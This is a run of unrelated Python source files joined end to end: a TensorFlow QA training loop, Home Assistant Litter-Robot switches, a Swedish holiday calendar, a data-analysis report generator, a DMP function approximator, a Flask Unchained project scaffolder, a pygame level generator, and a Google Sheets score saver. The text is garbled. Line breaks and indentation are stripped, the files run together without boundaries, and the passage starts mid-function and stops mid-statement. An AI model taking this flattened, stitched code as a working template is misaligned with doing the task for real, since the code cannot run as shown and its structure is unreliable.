discard_long=True, meaning we discard any examples # which are longer than our context_len or question_len. # We need to do this because if, for example, the true answer is cut # off the context, then the loss function is undefined. for batch in get_batch_generator(self.word2id, dev_context_path, dev_qn_path, dev_ans_path, self.FLAGS.batch_size, context_len=self.FLAGS.context_len, question_len=self.FLAGS.question_len, discard_long=True): # Get loss for this batch loss = self.get_loss(session, batch) curr_batch_size = batch.batch_size loss_per_batch.append(loss * curr_batch_size) batch_lengths.append(curr_batch_size) # Calculate average loss total_num_examples = sum(batch_lengths) toc = time.time() print "Computed dev loss over %i examples in %.2f seconds" % (total_num_examples, toc-tic) # Overall loss is total loss divided by total number of examples dev_loss = sum(loss_per_batch) / float(total_num_examples) return dev_loss def check_f1_em(self, session, context_path, qn_path, ans_path, dataset, num_samples=100, print_to_screen=False): logging.info("Calculating F1/EM for %s examples in %s set..." % (str(num_samples) if num_samples != 0 else "all", dataset)) f1_total = 0. em_total = 0. example_num = 0 tic = time.time() # Note here we select discard_long=False because we want to sample from the entire dataset # That means we're truncating, rather than discarding, examples with too-long context or questions for batch in get_batch_generator(self.word2id, context_path, qn_path, ans_path, self.FLAGS.batch_size, context_len=self.FLAGS.context_len, question_len=self.FLAGS.question_len, discard_long=False): pred_start_pos, pred_end_pos = self.get_start_end_pos(session, batch) # Convert the start and end positions to lists length batch_size pred_start_pos = pred_start_pos.tolist() # list length batch_size pred_end_pos = pred_end_pos.tolist() # list length batch_size for ex_idx, (pred_ans_start, pred_ans_end, true_ans_tokens) in enumerate(zip(pred_start_pos, pred_end_pos, batch.ans_tokens)): example_num += 1 # Get the predicted answer # Important: batch.context_tokens contains the original words (no UNKs) # You need to use the original no-UNK version when measuring F1/EM pred_ans_tokens = batch.context_tokens[ex_idx][pred_ans_start : pred_ans_end + 1] pred_answer = " ".join(pred_ans_tokens) # Get true answer (no UNKs) true_answer = " ".join(true_ans_tokens) # Calc F1/EM f1 = f1_score(pred_answer, true_answer) em = exact_match_score(pred_answer, true_answer) f1_total += f1 em_total += em # Optionally pretty-print if print_to_screen: print_example(self.word2id, batch.context_tokens[ex_idx], batch.qn_tokens[ex_idx], batch.ans_span[ex_idx, 0], batch.ans_span[ex_idx, 1], pred_ans_start, pred_ans_end, true_answer, pred_answer, f1, em) if num_samples != 0 and example_num >= num_samples: break if num_samples != 0 and example_num >= num_samples: break f1_total /= example_num em_total /= example_num toc = time.time() logging.info("Calculating F1/EM for %i examples in %s set took %.2f seconds" % (example_num, dataset, toc-tic)) return f1_total, em_total def train(self, session, train_context_path, train_qn_path, train_ans_path, dev_qn_path, dev_context_path, dev_ans_path): # Print number of model parameters tic = time.time() params = tf.trainable_variables() num_params = sum(map(lambda t: np.prod(tf.shape(t.value()).eval()), params)) toc = time.time() logging.info("Number of params: %d (retrieval took %f secs)" % (num_params, toc - tic)) # We will keep track of exponentially-smoothed loss exp_loss = None # Checkpoint management. # We keep one latest checkpoint, and one best checkpoint (early stopping) checkpoint_path = os.path.join(self.FLAGS.train_dir, "qa.ckpt") bestmodel_dir = os.path.join(self.FLAGS.train_dir, "best_checkpoint") bestmodel_ckpt_path = os.path.join(bestmodel_dir, "qa_best.ckpt") best_dev_f1 = None best_dev_em = None # for TensorBoard summary_writer = tf.summary.FileWriter(self.FLAGS.train_dir, session.graph) epoch = 0 logging.info("Beginning training loop...") while self.FLAGS.num_epochs == 0 or epoch < self.FLAGS.num_epochs: epoch += 1 epoch_tic = time.time() # Loop over batches for batch in get_batch_generator(self.word2id, train_context_path, train_qn_path, train_ans_path, self.FLAGS.batch_size, context_len=self.FLAGS.context_len, question_len=self.FLAGS.question_len, discard_long=True): # Run training iteration iter_tic = time.time() loss, global_step, param_norm, grad_norm = self.run_train_iter(session, batch, summary_writer) iter_toc = time.time() iter_time = iter_toc - iter_tic # Update exponentially-smoothed loss if not exp_loss: # first iter exp_loss = loss else: exp_loss = 0.99 * exp_loss + 0.01 * loss # Sometimes print info to screen if global_step % self.FLAGS.print_every == 0: logging.info( 'epoch %d, iter %d, loss %.5f, smoothed loss %.5f, grad norm %.5f, param norm %.5f, batch time %.3f' % (epoch, global_step, loss, exp_loss, grad_norm, param_norm, iter_time)) # Sometimes save model if global_step % self.FLAGS.save_every == 0: logging.info("Saving to %s..." % checkpoint_path) self.saver.save(session, checkpoint_path, global_step=global_step) # Sometimes evaluate model on dev loss, train F1/EM and dev F1/EM if global_step % self.FLAGS.eval_every == 0: # Get loss for entire dev set and log to tensorboard dev_loss = self.get_dev_loss(session, dev_context_path, dev_qn_path, dev_ans_path) logging.info("Epoch %d, Iter %d, dev loss: %f" % (epoch, global_step, dev_loss)) write_summary(dev_loss, "dev/loss", summary_writer, global_step) # Get F1/EM on train set and log to tensorboard train_f1, train_em = self.check_f1_em(session, train_context_path, train_qn_path, train_ans_path, "train", num_samples=1000) logging.info("Epoch %d, Iter %d, Train F1 score: %f, Train EM score: %f" % (epoch, global_step, train_f1, train_em)) write_summary(train_f1, "train/F1", summary_writer, global_step) write_summary(train_em, "train/EM", summary_writer, global_step) # Get F1/EM on dev set and log to tensorboard dev_f1, dev_em = self.check_f1_em(session, dev_context_path, dev_qn_path, dev_ans_path, "dev", num_samples=0) logging.info("Epoch %d, Iter %d, Dev F1 score: %f, Dev EM score: %f" % (epoch, global_step, dev_f1, dev_em)) write_summary(dev_f1, "dev/F1", summary_writer, global_step) write_summary(dev_em, "dev/EM", summary_writer, global_step) # Early stopping based on dev EM. You could switch this to use F1 instead. if best_dev_em is None or dev_em > best_dev_em: best_dev_em = dev_em logging.info("Saving to %s..." % bestmodel_ckpt_path) self.bestmodel_saver.save(session, bestmodel_ckpt_path, global_step=global_step) epoch_toc = time.time() logging.info("End of epoch %i. Time for epoch: %f" % (epoch, epoch_toc-epoch_tic)) sys.stdout.flush() def write_summary(value, tag, summary_writer, global_step): summary = tf.Summary() summary.value.add(tag=tag, simple_value=value) summary_writer.add_summary(summary, global_step)
"""Support for Litter-Robot switches.""" from homeassistant.helpers.entity import ToggleEntity from .const import DOMAIN from .hub import LitterRobotEntity class LitterRobotNightLightModeSwitch(LitterRobotEntity, ToggleEntity): """Litter-Robot Night Light Mode Switch.""" @property def is_on(self): """Return true if switch is on.""" return self.robot.night_light_active @property def icon(self): """Return the icon.""" return "mdi:lightbulb-on" if self.is_on else "mdi:lightbulb-off" async def async_turn_on(self, **kwargs): """Turn the switch on.""" await self.perform_action_and_refresh(self.robot.set_night_light, True) async def async_turn_off(self, **kwargs): """Turn the switch off.""" await self.perform_action_and_refresh(self.robot.set_night_light, False) class LitterRobotPanelLockoutSwitch(LitterRobotEntity, ToggleEntity): """Litter-Robot Panel Lockout Switch.""" @property def is_on(self): """Return true if switch is on.""" return self.robot.panel_lock_active @property def icon(self): """Return the icon.""" return "mdi:lock" if self.is_on else "mdi:lock-open" async def async_turn_on(self, **kwargs): """Turn the switch on.""" await self.perform_action_and_refresh(self.robot.set_panel_lockout, True) async def async_turn_off(self, **kwargs): """Turn the switch off.""" await self.perform_action_and_refresh(self.robot.set_panel_lockout, False) ROBOT_SWITCHES = { "Night Light Mode": LitterRobotNightLightModeSwitch, "Panel Lockout": LitterRobotPanelLockoutSwitch, } async def async_setup_entry(hass, config_entry, async_add_entities): """Set up Litter-Robot switches using config entry.""" hub = hass.data[DOMAIN][config_entry.entry_id] entities = [] for robot in hub.account.robots: for switch_type, switch_class in ROBOT_SWITCHES.items(): entities.append(switch_class(robot, switch_type, hub)) if entities: async_add_entities(entities, True)
# coding=utf-8 from dateutil.easter import EASTER_WESTERN from holidata.utils import SmartDayArrow from .holidays import Locale, Holiday """ source: https://www.riksdagen.se/sv/dokument-lagar/dokument/svensk-forfattningssamling/lag-1989253-om-allmanna-helgdagar_sfs-1989-253 source: https://www.riksdagen.se/sv/dokument-lagar/dokument/svensk-forfattningssamling/semesterlag-1977480_sfs-1977-480 """ class sv_SE(Locale): """ 01-01: [NF] Nyårsdagen 01-06: [NRF] Trettondedag jul 05-01: [NF] Första maj 06-06: [NF] Nationaldagen 12-24: [NRF] Julafton 12-25: [NRF] Juldagen 12-26: [NRF] Annandag jul 12-31: [NF] Nyårsafton 2 days before Easter: [NRV] Långfredagen Easter: [NRV] Påskdagen 1 day after Easter: [NRV] Annandag påsk 39 days after Easter: [NRV] Kristi himmelsfärdsdag 49 days after Easter: [NRV] Pingstdagen """ locale = "sv-SE" easter_type = EASTER_WESTERN def __midsommar(self): """ Find the Saturday between 20 and 26 June """ return SmartDayArrow(self.year, 6, 19).shift_to_weekday('saturday', order=1, reverse=False) def holiday_midsommarafton(self): """ The day before midsommardagen: [NV] Midsommarafton """ return [Holiday( self.locale, "", self.__midsommar().shift(days=-1), "Midsommarafton", "NV" )] def holiday_midsommardagen(self): """ Saturday between 20 and 26 June: [NV] Midsommardagen """ return [Holiday( self.locale, "", self.__midsommar(), "Midsommardagen", "NV" )] def holiday_alla_helgons_dag(self): """ Saturday between 31 October and 6 November: [NRV] Alla helgons dag """ return [Holiday( self.locale, "", SmartDayArrow(self.year, 10, 30).shift_to_weekday('saturday', order=1, reverse=False), "Alla helgons dag", "NRV" )]
################################################################ __author__='acgreyjo' # # The file handles and controls the post processing of the user # data and parsing the user configuration in order to determine # the type of analysis to perform. # ################################################################ import os import sys import importlib import argparse import pandas as pd import io import requests from datetime import datetime sys.path.append(r'../../application') from processor import * class Analyzer(object): def __init__(self, setup_config='', proxy=''): self.config_file = setup_config self.proxy = proxy self.task_name = '' self.dFrame = None self.url_to_data = '' self.output_file_path = '' self.program_name = '' self.groupby_column = [] self.ignore_column = [] self.treatment_column = [] self.x_column = [] self.y_column = [] self.dist_types = [] self.input_validate() self.results = {} def input_validate(self): ''' Function validates user input found in the configuration file that is passed in. Ensure that default class variables are present :return: None ''' setup_mod_obj = None if self.config_file: abs_path = os.path.abspath(self.config_file) print('[-i-] Current Path:', abs_path) spec = importlib.util.spec_from_file_location(abs_path, abs_path) module = importlib.util.module_from_spec(spec) spec.loader.exec_module(module) setup_mod_obj = module assert hasattr(setup_mod_obj, 'url_to_data') assert hasattr(setup_mod_obj, 'task_name') assert hasattr(setup_mod_obj, 'output_file_path') assert hasattr(setup_mod_obj, 'hdf5_file_name') assert hasattr(setup_mod_obj, 'column_groupby') assert hasattr(setup_mod_obj, 'program_name') assert hasattr(setup_mod_obj, 'ignore_columns') assert hasattr(setup_mod_obj, 'treatment_column') assert hasattr(setup_mod_obj, 'x_column') assert hasattr(setup_mod_obj, 'y_column') assert hasattr(setup_mod_obj, 'dist_type') self.url_to_data = setup_mod_obj.url_to_data self.task_name = setup_mod_obj.task_name self.output_file_path = setup_mod_obj.output_file_path self.groupby_column = setup_mod_obj.column_groupby self.program_name = setup_mod_obj.program_name self.ignore_column = setup_mod_obj.ignore_columns self.treatment_column = setup_mod_obj.treatment_column self.x_column = setup_mod_obj.x_column self.y_column = setup_mod_obj.y_column self.dist_types = setup_mod_obj.dist_type print('[-i-] Config Validation Completed.') def load_data(self): ''' This dataset contains 21 body dimension measurements as well as age, weight, height, and gender on 507 individuals. The 247 men and 260 women were primarily individuals in their twenties and thirties, with a scattering of older men and women, all exercising several hours a week. SOURCE: Measurements were initially taken by the first two authors - Grete Heinz and Louis J. Peterson - at San Jose State University and at the U.S. Naval Postgraduate School in Monterey, California. Later, measurements were taken at dozens of California health and fitness clubs by technicians under the supervision of one of these authors. :return: dataFrame ''' headers = ['Biacromial diameter', 'Biiliac diameter', 'Bitrochanteric', 'Chest depth', 'Chest diameter', 'Elbow diameter', 'Wrist diameter', 'Knee diameter', 'Ankle diameter', 'Shoulder girth', 'Chest girth', 'Waist girth', 'Navel girth', 'Hip girth', 'Thigh girth', 'Bicep girth', 'Forearm girth', 'Knee girth', 'Calf maximum girth', 'Ankle minimum girth', 'Wrist minimum girth', 'Age', 'Weight', 'Height', 'Gender' ] try: _df = pd.read_csv(self.url_to_data, delim_whitespace=True) except Exception as e: print('[-w-] Using proxy.....') stream = requests.get(self.url_to_data, proxies={'http': self.proxy}).text _df = pd.read_csv(io.StringIO(stream), delim_whitespace=True) # set header and replace gender column to categorical _df.columns = headers _df['Gender'] = _df['Gender'].apply(lambda x: 'M' if x == 1 else 'F') self.dFrame = _df print('[-i-] DataFrame:\n', self.dFrame.head()) # self.write_data(r'data\inputdata.csv') def write_data(self, file_path=''): ''' writes dataframe data to local store :param file_path: internal file location :return: None ''' if not self.dFrame.empty: self.dFrame.to_csv(file_path, index=False) def process_data(self): ''' process and plot base on distribution :return: ''' for plot_type in self.dist_types: print(f'[-i-] Running Plot type: {plot_type}') if plot_type.lower() == 'dist': print('Processing for dist.') # from analytika.application.dist import Dist from analyze.dist import Dist dist_obj = Dist() elif plot_type.lower() == 'dist_by': print('Processing for distby') from analyze.dist_by import Dist_By dist_obj = Dist_By() elif plot_type.lower() == 'hist_2d': print('Processings for Hist2D') from analyze.hist_2d import Hist_2D dist_obj = Hist_2D() elif plot_type.lower() == 'box': from analyze.box import Box dist_obj = Box() elif plot_type.lower() == 'var': print('Processing for variability') dist_obj.dFrame = self.dFrame dist_obj.task_name = self.task_name dist_obj.x_columns = self.x_column dist_obj.y_columns = self.y_column dist_obj.groupby = self.groupby_column if dist_obj: dist_obj.visualize() self.results[plot_type] = dist_obj.results def create_folder(self, use_folder=''): ''' with current setting os.getcwd() should be equal to public folder /analytika/public :param use_folder: :return: ''' if not use_folder: # create default task folders without datetime stamps use_folder = os.path.join(os.getcwd(),'application','scheduledOutput',self.task_name) print(use_folder) if not os.path.exists(use_folder): os.makedirs(use_folder) def generate_report(self): # generate datetime and use as sub-folder date = datetime.now() cur_date = date.strftime("%Y-%m-%d_%H-%M-%S") tmp_str = '' for idx,dist_type in enumerate(self.dist_types): print(f'[-i-] Generate Report:{dist_type}') tmp_str += ''' <div class="card_stack"> <h1>Card {}</h1> {} </div> '''.format(str(idx), self.results[dist_type].output_plots[0]) template = ''' <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta http-equiv="X-UA-Compatible" content="ie=edge" /> <title></title> <link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.4.1/css/bootstrap.min.css" /> <link rel="stylesheet" href="../../../../css/index.css" /> </head> <body> <main> {} </main> </body> </html> '''.format(tmp_str) # write out report # use_folder = os.path.join(os.getcwd(), '..', 'application', 'scheduledOutput', self.task_name, cur_date) use_folder = os.path.join(os.getcwd(),'application', 'scheduledOutput', self.task_name, cur_date) self.create_folder(use_folder=use_folder) file_path = os.path.join(use_folder, 'report.html') with open(file_path,'w') as hdl: hdl.write(template) def parse_options(): # parse the command line input parser = argparse.ArgumentParser() parser.add_argument('-setup', required=True, action='store') parser.add_argument('-proxy', required=False, action='store') parser.add_argument('-debug', required=False, action='store_true') args = parser.parse_args() return args # entry point if __name__ == '__main__': print('[-i-] Analyzer Starting...') options = parse_options() config_file = options.setup use_proxy = options.proxy run_analyzer = Analyzer(setup_config=config_file, proxy=use_proxy) run_analyzer.create_folder() run_analyzer.load_data() run_analyzer.process_data() run_analyzer.generate_report() print('[-i-] Task Completed.')
#!/usr/bin/env python2 # -*- coding: utf-8 -*- """Created on Mon Oct 30 19:00:00 2017 @author: gsutanto """ import numpy as np import os import sys import copy from CanonicalSystem import * class FunctionApproximator: "Base class for function approximators of DMPs." def __init__(self, dmp_num_dimensions_init, model_size_init, canonical_system, name=""): self.name = name self.dmp_num_dimensions = dmp_num_dimensions_init self.model_size = model_size_init self.canonical_sys = canonical_system self.weights = np.zeros((self.dmp_num_dimensions, self.model_size)) def isValid(self): assert (self.dmp_num_dimensions > 0), "self.dmp_num_dimensions=" + str( self.dmp_num_dimensions) + "<= 0 (invalid!)" assert (self.model_size > 0), "self.model_size=" + str(self.model_size) + "<= 0 (invalid!)" assert (self.canonical_sys != None), "CanonicalSystem canonical_sys does NOT exist!" assert (self.canonical_sys.isValid() ), "CanonicalSystem canonical_sys is invalid!" assert ( (self.weights.shape[0] == self.dmp_num_dimensions) and (self.weights.shape[1] == self.model_size) ), "Weights matrix dimensions=" + str( self.weights.shape[0]) + "X" + self.weights.shape[ 1] + " is/are mis-matched with self.dmp_num_dimensions=" + str( self.dmp_num_dimensions) + " and/or self.model_size=" + str( self.model_size) return True def getWeights(self): assert (self.isValid()) return copy.copy(self.weights) def setWeights(self, new_weights): assert (self.isValid()) assert (new_weights.shape == (self.dmp_num_dimensions, self.model_size)) self.weights = copy.copy(new_weights) return None
import os import re import shutil import sys from flask_unchained.cli import click from flask_unchained.click import default, skip_prompting from flask_unchained.string_utils import right_replace from jinja2 import Environment from typing import * JINJA_START_STR = '{#!' JINJA_END_STR = '#}' OTHER_START_STR = '#! ' OTHER_INLINE_START_STR = '#!(' OTHER_INLINE_END_STR = ')' env = Environment() _excluded = object() MODULE_NAME_RE = re.compile(r'^[a-zA-Z_][a-zA-Z0-9_]*$') IF_RE = re.compile(r'^if (?P<condition>.+): ?(?P<statement>.+)?$') ELIF_RE = re.compile(r'^elif (?P<condition>.+): ?(?P<statement>.+)?$') ELSE_RE = re.compile(r'^else: ?(?P<statement>.+)?$') TEMPLATES_ROOT = os.path.abspath( os.path.join(os.path.dirname(__file__), os.pardir, '_code_templates')) PROJECT_TEMPLATE = os.path.join(TEMPLATES_ROOT, 'project') def _validate_module_name(ctx, param, value): try: assert MODULE_NAME_RE.match(value) is not None return value except AssertionError: raise click.BadParameter('must be a valid python module name ' '(letters, numbers, and underscore characters only)') class Token: def __init__(self, line_num=0, token=None): self._line_num = line_num self.tokens = [] if token is not None: self.tokens.append(token) @property def line_num(self): return self._line_num + 1 @line_num.setter def line_num(self, line_num): self._line_num = line_num - 1 def render(self, ctx=None, *, _debug=False): if len(self.tokens) == 1: token = self.tokens[0] if isinstance(token, str): return token if not _debug else f'{self.line_num}: {token}' return token.render(ctx, _debug=_debug) lines = [] for t in self.tokens: result = t.render(ctx, _debug=_debug) if result is not _excluded: lines.append(result) return '\n'.join(lines) def __repr__(self): return f'{self.__class__.__name__}(tokens=\n{self.tokens!r})' class InlineToken(Token): def __init__(self, line_num, parts): super().__init__(line_num) self.tokens = parts def render(self, ctx=None, *, _debug=False): if len(self.tokens) == 1: if isinstance(self.tokens[0], (str, InlineToken)): return env.from_string(self.tokens[0]).render(**ctx) return super().render(ctx, _debug=_debug) parts = [] for t in self.tokens: if isinstance(t, str): parts.append(t) continue result = t.render(ctx, _debug=_debug) if result is not _excluded: parts.append(result) return ('' if not _debug else f'{self.line_num}: ') + ''.join(parts) def __str__(self): if len(self.tokens) > 1: return ''.join(str(t) for t in self.tokens) return self.tokens[0] class IfToken(Token): def __init__(self, line_num, condition, statement): super().__init__(line_num) self.condition = condition self.statement = statement self.next = None def render(self, ctx=None, *, _debug=False): condition = (self.condition if isinstance(self.condition, (str, bytes)) else repr(self.condition)) if not eval(condition, env.globals, ctx): if self.next: return self.next.render(ctx, _debug=_debug) return _excluded if self.statement: result = env.from_string(self.statement).render(**ctx) return result if not _debug else f'{self.line_num}: {result}' else: return super().render(ctx, _debug=_debug) def __repr__(self): return f'IfToken(cond={self.condition!r}, token={self.tokens[0]!r}, next={self.next!r})' @click.group() def new(): """ Generate new code for your Flask Unchained projects. """ @new.command() @click.argument('dest', type=click.Path(resolve_path=True), help='The project folder.') @click.option('-a', '--app-bundle', default='app', help='The module name to use for your app bundle.', callback=_validate_module_name) @click.option('--force/--no-force', default=False, show_default=True, help='Whether or not to force creation if project folder is not empty.') @click.option('--no-prompt', is_eager=True, is_flag=True, expose_value=False, help='Whether or not to skip prompting and just use the defaults.', default=False, show_default=True, callback=skip_prompting) @click.option('--dev/--no-dev', prompt='Development Mode', help='Whether or not to install development dependencies.', default=lambda: default(True), show_default=True) @click.option('--admin/--no-admin', prompt='Admin Bundle', help='Whether or not to install the Admin Bundle.', default=lambda: default(False), show_default=True) @click.option('--api/--no-api', prompt='API Bundle', help='Whether or not to install the API Bundle.', default=lambda: default(False), show_default=True) @click.option('--celery/--no-celery', prompt='Celery Bundle', help='Whether or not to install the Celery Bundle.', default=lambda: default(False), show_default=True) @click.option('--graphene/--no-graphene', prompt='Graphene Bundle', help='Whether or not to install the Graphene Bundle.', default=lambda: default(False), show_default=True) @click.option('--mail/--no-mail', prompt='Mail Bundle', help='Whether or not to install the Mail Bundle.', default=lambda: default(False), show_default=True) @click.option('--oauth/--no-oauth', prompt='OAuth Bundle', help='Whether or not to install the OAuth Bundle.', default=lambda: default(False), show_default=True) @click.option('--security/--no-security', prompt='Security Bundle', help='Whether or not to install the Security Bundle.', default=lambda: default(False), show_default=True) @click.option('--session/--no-session', prompt='Session Bundle', help='Whether or not to install the Session Bundle.', default=lambda: default(False), show_default=True) @click.option('--sqlalchemy/--no-sqlalchemy', prompt='SQLAlchemy Bundle', help='Whether or not to install the SQLAlchemy Bundle.', default=lambda: default(False), show_default=True) @click.option('--webpack/--no-webpack', prompt='Webpack Bundle', help='Whether or not to install the Webpack Bundle.', default=lambda: default(False), show_default=True) def project(dest, app_bundle, force, dev, admin, api, celery, graphene, mail, oauth, security, session, sqlalchemy, webpack): """ Create a new Flask Unchained project. """ if os.path.exists(dest) and os.listdir(dest) and not force: if not click.confirm(f'WARNING: Project directory {dest!r} exists and is ' f'not empty. It will be DELETED!!! Continue?'): click.echo(f'Exiting.') sys.exit(1) # build up a list of dependencies # IMPORTANT: keys here must match setup.py's `extra_requires` keys ctx = dict(dev=dev, admin=admin, api=api, celery=celery, graphene=graphene, mail=mail, oauth=oauth, security=security or oauth, session=security or session, sqlalchemy=security or sqlalchemy, webpack=webpack) ctx['requirements'] = [k for k, v in ctx.items() if v] # remaining ctx vars ctx['app_bundle_module_name'] = app_bundle # copy the project template into place copy_file_tree(PROJECT_TEMPLATE, dest, ctx, [ (option, files) for option, files in [('api', ['app/serializers']), ('celery', ['app/tasks', 'celery.py']), ('graphene', ['app/graphql']), ('mail', ['templates/email']), ('security', ['app/models/role.py', 'app/models/user.py', 'db/fixtures/Role.yaml', 'db/fixtures/User.yaml']), ('webpack', ['assets', 'package.json', 'webpack']), ] if not ctx[option] ]) click.echo(f'Successfully created a new project at: {dest}') def copy_file_tree(src: str, dest: str, ctx: Optional[Dict[str, Any]] = None, option_locations: Optional[List[Tuple[str, List[str]]]] = None): """ Copy the file tree under the :param:`src` directory to the :param:`dest` directory. Pass :param:`ctx` to support rendering the files, and pass :param:`option_locations` to support deleting optional files/folders. """ if os.path.exists(dest): shutil.rmtree(dest, ignore_errors=True) shutil.copytree(src, dest) if option_locations: for option, paths in option_locations: for path in paths: path = os.path.join(dest, path) if os.path.isfile(path): os.remove(path) else: shutil.rmtree(path, ignore_errors=True) if 'app_bundle_module_name' in ctx: shutil.move(os.path.join(dest, 'app'), os.path.join(dest, ctx['app_bundle_module_name'])) shutil.move(os.path.join(dest, 'tests', 'app'), os.path.join(dest, 'tests', ctx['app_bundle_module_name'])) _render_file_tree(dest, ctx) def _render_file_tree(root_dir: str, ctx: Optional[Dict[str, Any]] = None): if not ctx: return for dirpath, dirnames, filenames in os.walk(root_dir): for filename in filenames: path = os.path.join(dirpath, filename) if ('__pycache__' in path or path.endswith('.pyc') or path.endswith('.pyo')): # absolutely no idea how this happens but whenever Flask Unchained # gets installed via pip, this cache crap happens os.remove(path) continue root_token = Token() try: with open(path) as f: lines = f.read().split('\n') root_token, _ = _process_tokens(lines, root_token, is_jinja=path.endswith('.html')) except UnicodeDecodeError as e: raise Exception(f'UnicodeDecodeError: {path} ({str(e)})') with open(path, 'w') as f: f.write(root_token.render(ctx)) def _process_tokens(lines: List[str], token: Token, *, is_jinja: bool = False, _depth: int = 0, _real_start_i: int = 0): start_str = JINJA_START_STR if is_jinja else OTHER_START_STR end_str = JINJA_END_STR if is_jinja else None i: int = 0 resume_from_real_i: int = 0 for i, line in enumerate(lines): if (_real_start_i + i) < resume_from_real_i: continue stripped = line.strip() if not stripped.startswith(start_str): token.tokens.append( _extract_inline_token(line, _real_start_i + i, is_jinja)) continue stripped = stripped[len(start_str):].strip() if end_str: stripped = right_replace(stripped, end_str, '').strip() if stripped == 'endif' and _depth > 0: return token, _real_start_i + i if_m = IF_RE.match(stripped) elif_m = ELIF_RE.match(stripped) else_m = ELSE_RE.match(stripped) if not any([if_m, elif_m, else_m]) and stripped != 'endif': token.tokens.append(InlineToken(_real_start_i + i, [ line[:line.find(start_str)] + stripped, ])) continue next_start_i = _real_start_i + i + 1 if if_m is not None: condition = if_m.groupdict()['condition'] statement = if_m.groupdict()['statement'] if_token = IfToken(_real_start_i + i, condition, line[:line.find(start_str):] + statement if statement else None) if not statement: if_token, resume_from_real_i = _process_tokens(lines[i + 1:], if_token, is_jinja=is_jinja, _depth=_depth + 1, _real_start_i=next_start_i) token.tokens.append(if_token) elif elif_m is not None: condition = elif_m.groupdict()['condition'] statement = elif_m.groupdict()['statement'] if_token = IfToken(_real_start_i + i, condition, line[:line.find(start_str):] + statement if statement else None) if not statement: if_token, resume_from_real_i = _process_tokens(lines[i + 1:], if_token, is_jinja=is_jinja, _depth=_depth, _real_start_i=next_start_i) token.next = if_token elif else_m is not None: statement = else_m.groupdict()['statement'] if_token = IfToken(_real_start_i + i, True, line[:line.find(start_str):] + statement if statement else None) if not statement: if_token, resume_from_real_i = _process_tokens(lines[i + 1:], if_token, is_jinja=is_jinja, _depth=_depth, _real_start_i=next_start_i) token.next = if_token continue return token, _real_start_i + i def _extract_inline_token(line: str, line_num: int, is_jinja: bool = False): start_str = JINJA_START_STR if is_jinja else OTHER_INLINE_START_STR end_str = JINJA_END_STR if is_jinja else OTHER_INLINE_END_STR if start_str not in line: return Token(line_num, line) def _clean_end(part): if part.startswith(end_str): return part[len(end_str):] return part end_i = 0 parts = [] while True: start_i = line.find(start_str, end_i) if start_i == -1: remaining = _clean_end(line[end_i:]) if remaining: parts.append(remaining) break parts.append(_clean_end(line[end_i:start_i])) if is_jinja: end_i = line.find(end_str, start_i) part = line[start_i+len(start_str):end_i] else: start_i, end_i = _find_inline_start_end_indexes(line, start_i) part = line[start_i:end_i].strip() parts.append(InlineToken(line_num, [part])) return InlineToken(line_num, parts) def _find_inline_start_end_indexes(line, start_idx=0): s = OTHER_INLINE_START_STR.strip()[-1] e = OTHER_INLINE_END_STR stack = 0 last_e = len(line) for i, char in enumerate(line[start_idx:]): if char == s: stack += 1 elif char == e: stack -= 1 if stack == 0: last_e = start_idx + i break return line.find(s, start_idx) + len(s), last_e
import random import pygame from . import settings from .object import Asteroid, PowerUp from .sound import SoundEffect class LevelDesign(pygame.sprite.Sprite): def __init__(self): super().__init__() self.current_level = 1 self.level_design = self.generate_level() self.font = pygame.font.Font(settings.FONT, 15) self.text = f"LEVEL: {self.current_level}" self.image = self.font.render(self.text, 1, settings.TEXT_COLOR) self.rect = self.image.get_rect() self.rect.topleft = [270, 10] self.sfx = SoundEffect(settings.LEVEL_UP, 0.5) def update(self): self.text = f"LEVEL: {self.current_level}" self.image = self.font.render(self.text, 1, settings.TEXT_COLOR) def get_level(self): return self.level_design def next_level(self): self.sfx.play() self.current_level += 1 self.level_design = self.generate_level() return self.level_design def _get_enemies(self): """Generates enemies, which is tripled each level up.""" num = self.current_level * 3 # Total number of objects on this level. enemies = [] for enemy in range(num): x = random.randint(600, 2000) y = random.randint(settings.LIMIT_UP, settings.LIMIT_DOWN) pos = [x, y] speed = [random.randint(3, 6), 0] enemies.append(Asteroid(settings.ASTEROID_SPRITE, pos, speed)) return enemies def _get_powerups(self): """Generates one or zero powerup for the level.""" num = random.randint(0, 1) powerups = [] for powerup in range(num): x = random.randint(600, 2000) y = random.randint(settings.LIMIT_UP, settings.LIMIT_DOWN) pos = [x, y] powerups.append(PowerUp(settings.POWER_UP_SPRITE, pos)) return powerups def generate_level(self): """Returns a tuple with all objects for the level.""" enemies = self._get_enemies() powerups = self._get_powerups() objs = (enemies, powerups) return objs
import gspread from oauth2client.service_account import ServiceAccountCredentials import sys class CloudSave: def __init__(self, sheet, credentials_file): try: scope = ["https://spreadsheets.google.com/feeds", "https://www.googleapis.com/auth/drive"] credentials = ServiceAccountCredentials.from_json_keyfile_name( credentials_file, scope) gc = gspread.authorize(credentials) except OSError as e: print("JSON file with Google account credentials not found!\ \nPlease make sure credentials.json exists in the root directory") sys.exit(1) self.datasheet = gc.open(sheet).worksheet("data") # Open google sheet self._update() def add_win(self, player_number): if player_number == 1: self.datasheet.update("E6", self.p1_data["wins"]+1) self.datasheet.update("E9", self.p1_data["current_win_streak"]+1) self.datasheet.update("E8", max( self.p1_data["current_win_streak"]+1, self.p1_data["longest_win_streak"])) self.datasheet.update("J9", 0) elif player_number == 2: self.datasheet.update("J6", self.p2_data["wins"]+1) self.datasheet.update("J9", self.p2_data["current_win_streak"]+1) self.datasheet.update("J8", max( self.p2_data["current_win_streak"]+1, self.p2_data["longest_win_streak"])) self.datasheet.update("E9", 0) self.datasheet.update("E2", self.total_games+1) self._update() # Clear data def reset(self): self.datasheet.update("E6", 0) self.datasheet.update("E9", 0) self.datasheet.update("E8", 0) self.datasheet.update("J9", 0) self.datasheet.update("J6", 0) self.datasheet.update("J9", 0) self.datasheet.update("J8", 0) self.datasheet.update("E9", 0) self.datasheet.update("E2", 0) self._update() def display_info(self, choice): if choice == 0: print(f"Total games played: {self.total_games}") elif choice == 1: print(f"Player 1 Wins: {self.p1_data['wins']}") print(f"Current winstreak : {self.p1_data['current_win_streak']}") print(f"Longest winstreak : {self.p1_data['longest_win_streak']}") elif choice == 2: print(f"Player 2 Wins: {self.p2_data['wins']}") print(f"Current winstreak : {self.p2_data['current_win_streak']}") print(f"Longest winstreak : {self.p2_data['longest_win_streak']}") # Load stats from google sheet def _update(self): self.total_games = 